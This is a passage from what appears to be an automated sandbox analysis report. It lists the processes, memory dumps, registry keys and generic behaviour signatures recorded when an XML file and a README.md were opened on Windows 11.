| PID 2600 wrote to memory of 3616 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
| PID 2600 wrote to memory of 3616 | N/A | C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE | C:\Program Files\Internet Explorer\iexplore.exe |
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\bin\TesserNet.xml"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\bin\TesserNet.xml
Network
Files
memory/2600-1-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-3-0x00007FFAE55C3000-0x00007FFAE55C4000-memory.dmp
memory/2600-2-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-0-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-5-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-7-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-6-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-4-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-8-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-9-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-10-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-11-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-13-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-12-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-14-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-19-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp
memory/2600-18-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-17-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-16-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
memory/2600-15-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
69s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\教程\README.md
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding